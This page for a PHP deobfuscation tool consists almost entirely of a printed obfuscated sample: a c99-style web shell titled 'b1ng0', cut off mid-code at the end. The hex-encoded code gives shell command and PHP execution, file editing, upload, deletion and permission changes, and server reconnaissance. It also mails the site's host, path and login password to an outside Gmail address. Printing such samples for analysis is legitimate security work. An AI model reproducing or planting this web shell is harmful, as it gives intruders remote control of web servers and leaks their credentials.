Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php /****/@null; /********/ /*******/ /********/ /****/NULL; /********/ /*******/ /********/ /****/@blank; /********/ /*******/ /********/ /** PASSWORD domain name **/ ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"]=Array("\x73\x65\x73\x73\x69" ."\x6f\x6e\x5f\x73\x74" ."\x61\x72" ."\x74","\x6...



Obfuscated php code

<?php 
/****/@null; /********/ /*******/ /********/
/****/NULL; /********/ /*******/ /********/
/****/@blank; /********/ /*******/ /********/
/** PASSWORD domain name **/
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"]=Array("\x73\x65\x73\x73\x69" ."\x6f\x6e\x5f\x73\x74" ."\x61\x72" ."\x74","\x65\x72\x72\x6f\x72" ."\x5f" ."\x72" ."\x65" ."\x70" ."\x6f\x72\x74\x69\x6e\x67","\x73\x65" ."\x74" ."\x5f" ."\x74" ."\x69\x6d\x65" ."\x5f" ."\x6c\x69\x6d\x69\x74","\x61\x72" ."\x72\x61\x79\x5f\x6b" ."\x65" ."\x79\x5f\x65" ."\x78\x69" ."\x73\x74\x73","" ."\x6d\x61\x69" ."\x6c","\x73\x65\x74\x63\x6f\x6f\x6b" ."\x69\x65","" ."\x64\x61\x74" ."\x65","\x74\x69\x6d\x65","\x64" ."\x61\x74\x65","\x62\x61\x73\x65\x6e\x61" ."\x6d\x65","\x70" ."\x68" ."\x70\x5f\x75" ."\x6e\x61\x6d" ."\x65","\x67\x65\x74\x5f\x63\x75" ."\x72\x72" ."\x65\x6e\x74\x5f\x75\x73" ."\x65\x72","\x67\x65\x74\x6d\x79\x75\x69" ."\x64","\x67\x65\x74" ."\x6d" ."\x79" ."\x67\x69" ."\x64","\x69\x6e\x69" ."\x5f" ."\x67" ."\x65\x74","\x67\x65" ."\x74\x63\x77\x64","" ."\x72\x65\x61" ."\x6c\x70\x61\x74\x68","\x72\x65" ."\x61\x6c" ."\x70\x61\x74\x68","\x70\x68\x70" ."\x76\x65\x72\x73\x69\x6f\x6e","\x64\x69\x73\x6b\x5f\x74" ."\x6f" ."\x74\x61\x6c" ."\x5f\x73\x70\x61\x63\x65","\x64\x69\x73\x6b\x5f\x66\x72\x65\x65\x5f\x73\x70\x61\x63\x65","\x63\x68\x64\x69\x72","\x72\x65" ."\x61\x6c\x70\x61\x74\x68","\x66\x6f\x70\x65\x6e","\x66\x77\x72\x69\x74\x65","\x66\x63\x6c\x6f\x73\x65","\x72\x65\x61" ."\x6c" ."\x70\x61\x74\x68","\x66\x69\x6c\x65\x5f\x65\x78\x69\x73\x74\x73","\x66\x69" ."\x6c\x65","\x68\x74" ."\x6d\x6c" ."\x73\x70" ."\x65\x63\x69\x61\x6c\x63" ."\x68\x61\x72\x73","\x72\x65\x61\x6c\x70\x61\x74\x68","" ."\x72" ."\x65\x61" ."\x6c\x70\x61" ."\x74\x68","\x70\x68\x70\x69\x6e\x66" ."\x6f","\x73\x65\x74" ."\x63\x6f\x6f\x6b\x69\x65","\x74\x69\x6d\x65","\x63\x68\x64\x69\x72","\x6d\x6b\x64\x69\x72","\x72" ."\x65" ."\x6e\x61" ."\x6d\x65","\x72\x6d\x64\x69\x72","\x75\x6e\x6c\x69\x6e\x6b","\x63\x68\x6d" ."\x6f\x64","\x72" ."\x65\x61\x6c\x70" ."\x61\x74\x68","" ."\x62\x61\x73\x65\x6e\x61\x6d\x65","" ."\x6d" ."\x6f\x76\x65\x5f\x75\x70\x6c\x6f" ."\x61\x64\x65\x64" ."\x5f\x66" ."\x69\x6c\x65","\x72\x65\x61" ."\x6c\x70" ."\x61" ."\x74\x68","\x72\x65" ."\x61\x6c\x70\x61\x74" ."\x68","\x72" ."\x65" ."\x61\x6c\x70" ."\x61" ."\x74\x68","\x72\x65\x61\x6c\x70\x61" ."\x74\x68","" ."\x72\x65\x61" ."\x6c" ."\x70\x61\x74\x68","\x72\x65\x61\x6c\x70\x61\x74\x68","\x6f\x70\x65\x6e\x64" ."\x69\x72","\x72\x65\x61\x64\x64\x69\x72","" ."\x69\x73\x5f\x64\x69\x72","\x61\x73\x6f\x72" ."\x74","\x61\x73\x6f\x72\x74","" ."\x66\x75\x6e\x63\x74\x69\x6f\x6e\x5f" ."\x65" ."\x78\x69\x73" ."\x74" ."\x73","\x66\x75\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73\x74" ."\x73","\x70" ."\x6f\x73\x69" ."\x78\x5f\x67\x65\x74\x70\x77\x75\x69" ."\x64","\x66" ."\x69" ."\x6c\x65" ."\x6f\x77" ."\x6e\x65" ."\x72","\x70\x6f\x73\x69\x78\x5f\x67" ."\x65\x74" ."\x67\x72\x67" ."\x69\x64","\x66\x69\x6c\x65" ."\x67\x72\x6f\x75\x70","\x72\x65\x61\x6c" ."\x70\x61\x74\x68","\x72\x65\x61\x6c\x70\x61" ."\x74\x68","\x72\x65\x61\x6c" ."\x70\x61" ."\x74\x68","\x72" ."\x65\x61\x6c\x70\x61\x74" ."\x68","\x72\x65\x61\x6c\x70\x61\x74\x68","\x72" ."\x65\x61\x6c\x70\x61\x74\x68","\x72\x65\x61\x6c\x70" ."\x61" ."\x74" ."\x68","" ."\x66" ."\x75" ."\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73","\x66\x75" ."\x6e\x63\x74\x69" ."\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73","\x70\x6f\x73" ."\x69" ."\x78\x5f\x67\x65\x74\x70\x77\x75\x69\x64","\x66\x69\x6c\x65\x6f\x77\x6e\x65\x72","\x70\x6f\x73" ."\x69\x78\x5f\x67\x65\x74\x67\x72\x67\x69\x64","" ."\x66\x69\x6c\x65\x67\x72\x6f\x75\x70","" ."\x72\x65\x61" ."\x6c\x70\x61\x74\x68","\x72\x65\x61\x6c\x70\x61\x74\x68","\x72\x65\x61\x6c" ."\x70\x61\x74\x68","" ."\x72\x65\x61" ."\x6c\x70\x61\x74\x68","\x72\x65\x61\x6c\x70\x61\x74\x68","\x72\x65\x61\x6c" ."\x70\x61\x74" ."\x68","\x72\x65\x61\x6c\x70" ."\x61" ."\x74" ."\x68","\x69\x6e\x69\x5f\x67\x65\x74","\x65\x78" ."\x74" ."\x65\x6e\x73\x69\x6f\x6e\x5f\x6c\x6f" ."\x61\x64" ."\x65\x64","\x66\x75\x6e\x63\x74\x69" ."\x6f\x6e\x5f\x65\x78" ."\x69\x73\x74\x73","\x66" ."\x75\x6e\x63\x74" ."\x69\x6f" ."\x6e\x5f\x65\x78\x69" ."\x73\x74\x73","\x66\x75\x6e\x63\x74" ."\x69" ."\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73","\x66\x75\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73","" ."\x72\x6f\x75" ."\x6e" ."\x64","\x72\x6f\x75\x6e\x64","\x72" ."\x6f" ."\x75\x6e\x64","\x67\x65\x74\x63\x77\x64","\x65" ."\x78\x70\x6c" ."\x6f\x64\x65","\x63\x6f\x75\x6e\x74","\x69" ."\x73\x5f\x77\x72\x69\x74\x61\x62" ."\x6c\x65","" ."\x69\x73\x5f\x77" ."\x72\x69\x74\x61\x62\x6c\x65","" ."\x69" ."\x73\x5f\x72\x65" ."\x61\x64\x61\x62\x6c\x65","\x69\x73\x5f" ."\x77\x72\x69\x74\x61\x62\x6c\x65","\x69\x73" ."\x5f\x72\x65" ."\x61\x64\x61\x62\x6c\x65","\x66\x69\x6c\x65" ."\x5f\x65\x78\x69\x73\x74" ."\x73","\x73\x75\x62" ."\x73\x74\x72","\x73" ."\x70\x72\x69\x6e\x74\x66","" ."\x66\x69\x6c" ."\x65\x70" ."\x65\x72\x6d\x73","\x66\x75\x6e" ."\x63\x74\x69" ."\x6f\x6e\x5f" ."\x65\x78\x69\x73\x74\x73","\x66\x75\x6e\x63\x74\x69" ."\x6f\x6e\x5f" ."\x65" ."\x78\x69\x73\x74\x73","" ."\x66\x75\x6e\x63\x74\x69" ."\x6f\x6e\x5f" ."\x65\x78" ."\x69\x73\x74\x73","\x66\x75\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69" ."\x73\x74\x73","\x70\x61\x73" ."\x73" ."\x74\x68\x72\x75","\x73\x79\x73\x74\x65\x6d","\x73\x68\x65\x6c" ."\x6c\x5f" ."\x65\x78\x65" ."\x63","\x65\x78\x65\x63","\x62\x61" ."\x73\x65" ."\x6e\x61\x6d\x65","\x68" ."\x65\x61\x64\x65\x72","\x62\x61\x73\x65\x6e\x61\x6d\x65"); ?><? function c99($i){$a=Array("\x77\x61\x74\x63\x68\x69\x6e\x67",'SERVER_NAME','PHP_SELF',"\n",'pass',"\x69\x6e\x62\x6f\x78\x6e\x6f\x74\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x6f\x77\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d",'Ding Dong','HTTP_HOST','PHPSESSID','pass','pass',"Ymd","Ymd","SERVER_SOFTWARE",' uid:',' gid:','safe_mode','<font color:lime>ON</font>','<font color=red>OFF</font>','#202020','lime','<html><head><title>b1ng0</title><style>body {background:',';color:',';font-size:9pt;font-family:sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:lime;}h1#nm{text-shadow:0px 0px 5px black;color:lime;}a {color:',';text-decoration:none;font-family:sans serif;}a:hover {color:lime;}hr {background:',';color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-size:13pt;}#menuB {background:',';box-shadow:0px 0px 10px black;border-radius:15px;padding:5px 20px 5px 20px;}table#moreI{font-size:9pt;background:',';border-radius:10px;box-shadow:0px 0px 10px black;padding:5px;position:fixed;bottom:40px;right:40px;display:none;}p#cp {font-size:11pt;}table#lt {font-size:10pt;}input#lt,input#sv {background:',';border-radius:10px;border:1px solid ',';color:',';text-align:center;}input#ltb {background:rgba(0,0,0,0);border-radius:10px;color:',';box-shadow:0px 0px 1px ',';border:0px solid rgba(0,0,0,0);}table#ft {font-size:9pt;padding:5px;border-radius:10px;box-shadow:0px 0px 10px black;}td#fh {border-bottom:1px solid ',';padding-bottom:3px;}tr#fn:hover{box-shadow:0px 0px 5px black;}h3 {text-shadow:0px 0px 4px black;font-size:13pt;}textarea#edit {background:',';color:',';box-shadow:0px 0px 10px black;border-radius:10px;border:none;padding:10px;}</style><script type="text/javascript">function get_inf() {if(document.getElementById(\'moreI\').style.display=="block"){document.getElementById(\'moreI\').style.display="none"}else {document.getElementById(\'moreI\').style.display="block";}} function xyn(id1,id2) {document.getElementById(id1).style.display="block";document.getElementById(id2).style.display="none";}</script></head><body><h1 id="n"><a href="?x=x"></a></h1>','<center><p id="menu"><span id="menuB"> <a href="','">Home</a> | <a href="?x=cmd&d="','.','">Command</a> | <a href="?x=php&d="','.','">PHP</a> | <a href="javascript:get_inf();">Info</a> | <a href="?x=q">Logout</a> </span></p></center>','</body></html>','<center><p id="inf">||| <b><i><u>Software:</u></i></b> ','  |||  <b><i><u>Uname:</u></i></b> ',' |||</br>||| <b><i><u>User:</u></i></b> ',' ||| <b><i><u>Safe Mode:</u></i></b> ',' |||</p></center><hr>','PHP Version','Curl','OpenBase Dir','MySQL','MsSQL','PostgreSQL','Oracle','Total Space','/','Used Space','/','Your IP','REMOTE_ADDR','Server IP','SERVER_ADDR','<table id="moreI">','<td>','</td><td> > </td><td> ','</td><tr>','<td colspan=3 align="center"><a href="?x=phpinf" target="_blank">PHPInfo</a></td></table>','d','d','x','<p id="bck"><a href="?d=','.','">BACK</a></p>','x','c','edit_form','f','w','<p id="nn">Error Opening File</p>','edit_form','<p id="nn">Couldn\'t Save File</p>','<center><p>Editing ','f',' (','d','f',') .</p></br></br><form action="?x=c&d=','.','&f=','f','" method="POST"><textarea cols=90 rows=15 name="edit_form" id="edit">','f','f','</textarea></br></br><input type="submit" value="Save" id="sv"></form></center>','cmd','</br></br><center><h3>Execute Command</h3><form action="?x=cmd&d=','.','" method="POST"><input type="text" value="" name="cmd" id="lt">  <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">','cmd','cmd','</textarea></center>','php','</br></br><center><h3>PHP Code</h3><form action=?x=php&d="','.','" method="POST"><input type="text" value="" name="pcode" id="lt"> <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">','</textarea></center>','phpinf','q','','d','d','ndir','d','ndir','new','new','old','d','deld','deld','delf','delf','ch','ch','df','upfile','name','.','upfile','name','upfile','tmp_name','<p align="center" id="cp">','','</p>','<table width=90% align="center" id="lt"cellpadding="0"><td align="center"><form action="?d=','.','" method="GET">Create Dir: <input type="hidden" name="d" value="','.','" id="lt"><input type="text" value="" name="ndir" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d="','.','" method="GET">Create File: <input type="hidden" value="','.','" name="d" id="lt"><input type="hidden" value="c" name="x"><input type="text" value="" name="f" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?x=cmd&d=','.','" method="POST">Command: <input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d=','.','" method="POST" enctype="multipart/form-data">Upload: <input type="hidden" value="100000000" name="MAX_FILE_SIZE"><input type="file" name="upfile" id="ltb"> <input type="submit" value="Go" id="lt"></form></td></table>','</br>','<table width="75%" align="center" id="ft" ><td id="fh"><b>Name</b></td><td id="fh" align="center"><b>Permissions</b></td><td id="fh" align="center"><b>Owner</b></td><td id="fh" align="center"><b>Options</b></td><tr id="fn">','.','posix_getpwuid','posix_getgrgid','name','???','name','???','<td id="fc"><span id="n','"><a href="?d=','">','</a></span><span id="r','" style="display:none;"><form action="?d=','.','" method="POST"><input type="hidden" value="','.','" name="d"> <input type="text" value="','" id="lt" name="new"><input type="hidden" value="','" name="old"> <input type="submit" id="lt" value="Rename"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'n','\',\'r','\');"></form></span><span id="d','" style="display:none;"><form action="?d=','.','" method="GET">Are you Sure?<input type="hidden" value="','" name="deld"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n','\',\'d','\')"></form></span></td><td id="fc" align="center"><span id="h','"><a href="javascript:xyn(\'c','\',\'h','\');"><font color="','">','</font></a></span><span id="c','" style="display:none;"><form action="?d=','.','" method="GET"><input type="hidden" value="','" name="df"><input type="text" value="','" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h','\',\'c','\');"></form></span></td><td id="fc" align="center">','name',' : ','name','</td>','<td id="fc"></td><tr id="fn">','<td id="fc" align="center"><a href="javascript:xyn(\'r','\',\'n','\')">[R]</a> <a href="javascript:xyn(\'d','\',\'n','\')">[D]</a></td><tr id="fn">','posix_getpwuid','posix_getgrgid','name','???','name','???','<td id="fc"><span id="n','"><a href="?x=c&d=','.','&f=','">','</a></span><span id="r','" style="display:none;"><form action="?d=','.','" method="POST"><input type="hidden" value="','.','" name="d"> <input type="text" id="lt" value="','" name="new"><input type="hidden" value="','" name="old"><input type="submit" id="lt" value="Rename"><input type="button" id="lt" value="Cancel" onClick="xyn(\'n','\',\'r','\');"></form></span><span id="d','" style="display:none;"><form action="?d=','.','" method="GET">Are you Sure?<input type="hidden" value="','" name="delf"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n','\',\'d','\')"></form></span></td><td id="fc" align="center"><span id="h','"><a href="javascript:xyn(\'c','\',\'h','\');"><font color="','">','</font></a></span><span id="c','" style="display:none;"><form action="?d=','.','" method="GET"><input type="hidden" value="','" name="df"><input type="text" value="','" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h','\',\'c','\');"></form></span></td><td id="fc" align="center">','name',' : ','name','</td><td id="fc" align="center"><a href="javascript:xyn(\'r','\',\'n','\')">[R]</a> <a href="javascript:xyn(\'d','\',\'n','\');">[D]</a></td><tr id="fn">','</table></br></br></br>','open_basedir','<font color=red>OFF</font>','<font color=lime>ON</font>','curl','<font color=lime>ON</font>','<font color=red>OFF</font>','ocilogon','<font color=lime>ON</font>','<font color=red>OFF</font>','pg_connect','<font color=lime>ON</font>','<font color=red>OFF</font>','mysql_connect','<font color=lime>ON</font>','<font color=red>OFF</font>','mssql_connect','<font color=lime>ON</font>','<font color=red>OFF</font>','GB','MB','KB','B','','','','<a href="?d=','">','</a>','lime','','','red','%o','???','passthru','passthru','exec','exec','shell_exec','shell_exec','system','system','Disabled','passthru','system','shell_exec','exec','</br>','dafuq?','<table border=0 width=100% height=100% align=center style="background:#202020;color:lime;"><td valign="middle"><center><form action="','" method="POST">Password <input type="password" name="pass" style="background:#202020;color:lime;border-radius:10px;border:1px solid silver;text-align:center;"> <input type="submit" name="watching" value=">>" style="background:#202020;color:lime;border-radius:10px;border:1px solid silver;"></form></center></td></table>',"Location: ");return $a[$i];} ?><?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][0]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][1](round(0));${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][2](round(0));if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][3](c99(0),$_POST)){$O_0=$_SERVER[c99(1)] .$_SERVER[c99(2)] .c99(3) .$_POST[c99(4)];@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][4](c99(5),c99(6),$O_0);}$O_1=$_SERVER[c99(7)];$O_2=c99(8);if(isset($_REQUEST[c99(9)])){if($_REQUEST[c99(10)]== $O_1){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][5]($O_2,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][6](c99(11)),${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][7]()+round(0+900+900+900+900));}o__13();}if(!empty($O_1)&&!isset($_COOKIE[$O_2])or($_COOKIE[$O_2]!= ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][8](c99(12)))){o__12();die();}$O_3=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][9](__FILE__);$O_4=$_SERVER[c99(13)];$O_5=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][10]();$O_6=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][11]() .c99(14) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][12]() .c99(15) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][13]();$O_7=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][14](c99(16));$O_7=($O_7)?(c99(17)):(c99(18));$O_8=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][15]();$O_9=c99(19);$O_10=c99(20);$O_11=c99(21) .$O_9 .c99(22) .$O_10 .c99(23) .$O_10 .c99(24) .$O_10 .c99(25) .$O_9 .c99(26) .$O_9 .c99(27) .$O_9 .c99(28) .$O_10 .c99(29) .$O_10 .c99(30) .$O_10 .c99(31) .$O_10 .c99(32) .$O_10 .c99(33) .$O_9 .c99(34) .$O_10 .c99(35);$O_12=c99(36) .$O_3 .c99(37) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][16](c99(38)) .c99(39) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][17](c99(40)) .c99(41);$O_13=c99(42);$O_14=c99(43) .$O_4 .c99(44) .$O_5 .c99(45) .$O_6 .c99(46) .$O_7 .c99(47);print $O_11;print $O_12;print $O_14;$O_15=array(c99(48)=> ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][18](),c99(49)=> o__1(),c99(50)=> o__0(),c99(51)=> o__4(),c99(52)=> o__5(),c99(53)=> o__3(),c99(54)=> o__2(),c99(55)=> o__6(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][19](c99(56))),c99(57)=> o__6(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][20](c99(58))),c99(59)=> $_SERVER[c99(60)],c99(61)=> $_SERVER[c99(62)]);print c99(63);foreach($O_15 as $O_16 => $O_17){print c99(64) .$O_16 .c99(65) .$O_17 .c99(66);}print c99(67);if(isset($_GET[c99(68)])){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][21]($_GET[c99(69)]);}if(isset($_REQUEST[c99(70)])){print c99(71) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][22](c99(72)) .c99(73);switch($_REQUEST[c99(74)]){case c99(75):if(isset($_POST[c99(76)])){$O_18=$_GET[c99(77)];$O_19=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][23]($O_18,c99(78))or print c99(79);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][24]($O_19,$_POST[c99(80)])or print c99(81);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][25]($O_19);}print c99(82) .$_GET[c99(83)] .c99(84) .o__9($_GET[c99(85)] .$_GET[c99(86)]) .c99(87) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][26](c99(88)) .c99(89) .$_GET[c99(90)] .c99(91);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][27]($_GET[c99(92)])){$O_20=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][28]($_GET[c99(93)]);foreach($O_20 as $O_21){print ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][29]($O_21);}}print c99(94);break;case c99(95):print c99(96) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][30](c99(97)) .c99(98);if(isset($_POST[c99(99)])){$O_22=$_POST[c99(100)];o__11(o__10(),$O_22);}print c99(101);break;case c99(102):print c99(103) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][31](c99(104)) .c99(105);print c99(106);break;case c99(107):${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][32]();break;case c99(108):${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][33]($O_2,c99(109),${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][34]()-round(0+900+900+900+900));o__13();break;}}else{if(isset($_GET[c99(110)])){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][35]($_GET[c99(111)]);}if(isset($_GET[c99(112)])){$O_23=$_GET[c99(113)];$O_16=$_GET[c99(114)];${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][36]($O_23 .DIRECTORY_SEPARATOR .$O_16);}if(isset($_POST[c99(115)])){$O_16=$_POST[c99(116)];$O_24=$_POST[c99(117)];$O_23=$_POST[c99(118)];${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][37]($O_23 .DIRECTORY_SEPARATOR .$O_24,$O_23 .DIRECTORY_SEPARATOR .$O_16);}if(isset($_GET[c99(119)])){$O_23=$_GET[c99(120)];${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][38]($O_23);}if(isset($_GET[c99(121)])){$O_23=$_GET[c99(122)];${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][39]($O_23);}if(isset($_GET[c99(123)])){$O_25=$_GET[c99(124)];$O_23=$_GET[c99(125)];${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][40]($O_23,$O_25);}if(isset($_FILES[c99(126)][c99(127)])){$O_23=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][41](c99(128)) .DIRECTORY_SEPARATOR .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][42]($_FILES[c99(129)][c99(130)]);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][43]($_FILES[c99(131)][c99(132)],$O_23);}print c99(133) .o__7(c99(134)) .c99(135);print c99(136) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][44](c99(137)) .c99(138) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][45](c99(139)) .c99(140) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][46](c99(141)) .c99(142) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][47](c99(143)) .c99(144) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][48](c99(145)) .c99(146) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][49](c99(147)) .c99(148);print c99(149);$O_26=array();$O_27=array();print c99(150);if($O_28=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][50](c99(151))){while(false !==($O_29=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][51]($O_28))){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][52]($O_29)){$O_27[].= $O_29;}else{$O_26[].= $O_29;}}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][53]($O_26);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][54]($O_27);$O_30=round(0);foreach($O_27 as $O_29){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][55](c99(152))&& ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][56](c99(153))){$O_31=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][57](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][58]($O_29));$O_32=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][59](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][60]($O_29));}else{$O_31[c99(154)]=c99(155);$O_32[c99(156)]=c99(157);}print c99(158) .$O_29 .c99(159) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][61]($O_29) .c99(160) .$O_29 .c99(161) .$O_29 .c99(162) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][62](c99(163)) .c99(164) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][63](c99(165)) .c99(166) .$O_29 .c99(167) .$O_29 .c99(168) .$O_29 .c99(169) .$O_29 .c99(170) .$O_29 .c99(171) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][64](c99(172)) .c99(173) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][65]($O_29) .c99(174) .$O_29 .c99(175) .$O_29 .c99(176) .$O_29 .c99(177) .$O_29 .c99(178) .$O_29 .c99(179) .o__8($O_29) .c99(180) .o__9($O_29) .c99(181) .$O_29 .c99(182) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][66](c99(183)) .c99(184) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][67]($O_29) .c99(185) .o__9($O_29) .c99(186) .$O_29 .c99(187) .$O_29 .c99(188) .$O_31[c99(189)] .c99(190) .$O_32[c99(191)] .c99(192);if($O_30==round(0)or $O_30==round(0+0.2+0.2+0.2+0.2+0.2)){print c99(193);}else{print c99(194) .$O_29 .c99(195) .$O_29 .c99(196) .$O_29 .c99(197) .$O_29 .c99(198);}$O_30++;}foreach($O_26 as $O_29){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][68](c99(199))&& ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][69](c99(200))){$O_31=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][70](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][71]($O_29));$O_32=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][72](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][73]($O_29));}else{$O_31[c99(201)]=c99(202);$O_32[c99(203)]=c99(204);}print c99(205) .$O_29 .c99(206) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][74](c99(207)) .c99(208) .$O_29 .c99(209) .$O_29 .c99(210) .$O_29 .c99(211) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][75](c99(212)) .c99(213) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][76](c99(214)) .c99(215) .$O_29 .c99(216) .$O_29 .c99(217) .$O_29 .c99(218) .$O_29 .c99(219) .$O_29 .c99(220) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][77](c99(221)) .c99(222) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][78]($O_29) .c99(223) .$O_29 .c99(224) .$O_29 .c99(225) .$O_29 .c99(226) .$O_29 .c99(227) .$O_29 .c99(228) .o__8($O_29) .c99(229) .o__9($O_29) .c99(230) .$O_29 .c99(231) 